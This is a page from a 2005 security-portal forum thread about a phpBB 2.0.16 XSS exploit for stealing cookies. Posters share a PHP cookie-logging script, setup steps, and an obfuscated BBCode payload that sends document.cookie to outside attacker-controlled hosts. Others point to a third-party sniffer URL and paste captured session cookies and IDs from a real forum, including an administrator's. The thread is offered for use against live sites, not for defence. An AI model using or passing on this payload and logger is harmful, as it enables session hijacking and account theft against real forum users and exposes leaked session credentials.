Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
December 7, 2023
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 443
Members: 0
Total: 443
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit Goto page Previous  1, 2, 3, 4, 5, 6, 7, 8  Next
Post new topic  Reply to topic View previous topic :: View next topic 
PostPosted: Fri Jul 29, 2005 4:26 pm Reply with quote
diegocure15
Active user
Active user
 
Joined: Sep 22, 2004
Posts: 27




i just wrote about it!!!!!!
and some other people have, you just have to read dont be lazy!

this next code copy it and save it as cookie.php upload it thru yous ftp


Quote:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '<br>Cookie: '.$cookie.'</br> IP: ' .$ip. '<br> Date and Time: ' .$date. '</br> Referer: '.$referer.' ');
fclose($fp);
?>


Now open your notepad and create a file call steal.php with nothing in it just name the file steal.php and upload it thru your ftp too once its on your rooot next to cookies.php or on the same path right click on steal.php and attributes (CHMOOD) or something like that and give it 777 permision and thats it.

if you try it in a forum and the cookie does not show on your steal.php fiule is cuz that forum is not vul,hope you understand this time,seeya.
View user's profile Send private message
PostPosted: Fri Jul 29, 2005 5:36 pm Reply with quote
discordia
Beginner
Beginner
 
Joined: Jun 20, 2005
Posts: 2




diegocure15 wrote:
Armageddon85 wrote:
I perfectly understand the second part to this exploit - thanks to the video... but now i dont understand the first.

does the script go on a file in your website with chmod at 777?

if so does anyone know webhosting service for free that has that ability.

all the ones i have signed up for have a "quick and easy" file management system.


www.lycos.com and just have to upload the cookie script normally and the create a file with chmod on the same path and give it 777 mod.


I couldn't find what you speak of at Lycos, did you mean Angelfire? It lycos sponsor site?

At Angelfire, I cannot change the file permissions, it says the server does not support this. Are there any other free servers that do?


Last edited by discordia on Fri Jul 29, 2005 8:24 pm; edited 1 time in total
View user's profile Send private message
PostPosted: Fri Jul 29, 2005 7:24 pm Reply with quote
700G
Active user
Active user
 
Joined: Mar 25, 2005
Posts: 33




You can also just leave the URL as is "http://antichat.ru/cgi-bin/s.jpg" and then go to: "http://antichat.ru/sniff/log.php" to view your cookies.
View user's profile Send private message
PostPosted: Sun Jul 31, 2005 2:54 pm Reply with quote
Gandrasss
Beginner
Beginner
 
Joined: Jul 31, 2005
Posts: 2




In The Cookie.txt file i find this kode phpbb2mysql_data=a:0:{}; phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:1:\"8\";}; phpbb2mysql_sid=abfc72e6fa2af4238d4568560900beae; phpbb2mysql_t=a:1:{i:1681;i:1122816363;}
that is password
View user's profile Send private message
PostPosted: Mon Aug 01, 2005 8:35 am Reply with quote
OnlyMe
Beginner
Beginner
 
Joined: Aug 01, 2005
Posts: 1




not working for me..dot know..which is exact code is working..anyone assist me..sebzero..please? give me the code.

regards
View user's profile Send private message
chmod answer
PostPosted: Mon Aug 01, 2005 1:48 pm Reply with quote
Noob
Beginner
Beginner
 
Joined: Aug 01, 2005
Posts: 1




when your in whatever ftp program you wanna use, after you upload the pages you created to the Server Domain, refresh your screen and right click on the files you just ftp'd and you see a option for set attributes. You will want to make sure all options are checked giving the files permission to run as a program script ON the server. Setting CHMOD Permissions is basically telling the server what the files are and arent allowed to do on your domain. 777 by default gives the files permission to do everything possible.


[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://area51portal.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
View user's profile Send private message
PostPosted: Mon Aug 01, 2005 8:29 pm Reply with quote
Gandrasss
Beginner
Beginner
 
Joined: Jul 31, 2005
Posts: 2




that is password abfc72e6fa2af4238d4568560900beae
View user's profile Send private message
PostPosted: Tue Aug 02, 2005 1:09 pm Reply with quote
Umuxai
Beginner
Beginner
 
Joined: Aug 02, 2005
Posts: 2




Is it possible to steal the whole cookies.txt file form IE with this method? As far as I remember IE is protecting this file... but I can be wrong Very Happy
View user's profile Send private message
PostPosted: Tue Aug 02, 2005 3:01 pm Reply with quote
Beat
Beginner
Beginner
 
Joined: Jul 29, 2005
Posts: 4




Umuxai wrote:
Is it possible to steal the whole cookies.txt file form IE with this method? As far as I remember IE is protecting this file... but I can be wrong Very Happy

There is no such thing as "cookies.txt" with IE Very Happy
View user's profile Send private message
PostPosted: Wed Aug 03, 2005 2:02 pm Reply with quote
Umuxai
Beginner
Beginner
 
Joined: Aug 02, 2005
Posts: 2




Oh yes... you are right Smile I forgot about it...

Is there any possibility to find out what cookies have user in his browser?
View user's profile Send private message
PostPosted: Thu Aug 04, 2005 12:50 am Reply with quote
darkclaw
Regular user
Regular user
 
Joined: Aug 04, 2005
Posts: 14




Sorry, i dont know if i am doing something wrong, but my cookies.php is like this:
Quote:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>


I post a reply in the forum with this in the msg:
Quote:
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://darkclaw.ionichost.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'


I uploaded cookies.php and cookies.txt to server. Chmoded cookies.txt to 777. But my cookies.txt is like this:

Cookie:
IP: ???.???.???.???
Date and Time: 3 August, 2005, 9:42 pm
Referer: referer page here


There is nothing after Cookie: !!
What am i doing wrong ?
View user's profile Send private message
PostPosted: Thu Aug 04, 2005 4:23 am Reply with quote
diegocure15
Active user
Active user
 
Joined: Sep 22, 2004
Posts: 27




forum has been patched.
View user's profile Send private message
PostPosted: Fri Aug 05, 2005 1:31 pm Reply with quote
DI1
Beginner
Beginner
 
Joined: Aug 05, 2005
Posts: 2




I tried it on some forum with 2.0.16 and I got it worked for a normal user. but then I got the cookie from the admin, but it seems it doesn't have a password hash Confused


Code:
<br>Cookie: phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:1:\"3\";}; SamMar_forum_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";i:-1;}; SamMar_forum_sid=3944130a0e2ac0db92619a6c40b003d7</br> IP: 212.78.204.27<br> Date and Time: 5 August, 2005, 3:02 pm</br> Referer: http://www.checkedforum.com/forum/viewtopic.php?t=40&start=135 <br>Cookie: phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:1:\"3\";}; SamMar_forum_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:1:\"3\";}; SamMar_forum_sid=3944130a0e2ac0db92619a6c40b003d7; SamMar_forum_t=a:4:{i:1448;i:1123246990;i:1646;i:1123247028;i:1680;i:1123247054;i:39;i:1123247060;}</br> IP: ************<br> Date and Time: 5 August, 2005, 3:04 pm</br> Referer: http://www.checkedforum.com/forum/viewtopic.php?t=40&start=135
View user's profile Send private message
PostPosted: Fri Aug 05, 2005 4:17 pm Reply with quote
Beat
Beginner
Beginner
 
Joined: Jul 29, 2005
Posts: 4




diegocure15 wrote:
forum has been patched.
View user's profile Send private message
PostPosted: Fri Aug 05, 2005 4:44 pm Reply with quote
DI1
Beginner
Beginner
 
Joined: Aug 05, 2005
Posts: 2




but I can still hack normal users. for those users a hashfile is given.

and the forum is still 2.0.16
View user's profile Send private message
phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 6 of 8  
Goto page Previous  1, 2, 3, 4, 5, 6, 7, 8  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.172 Seconds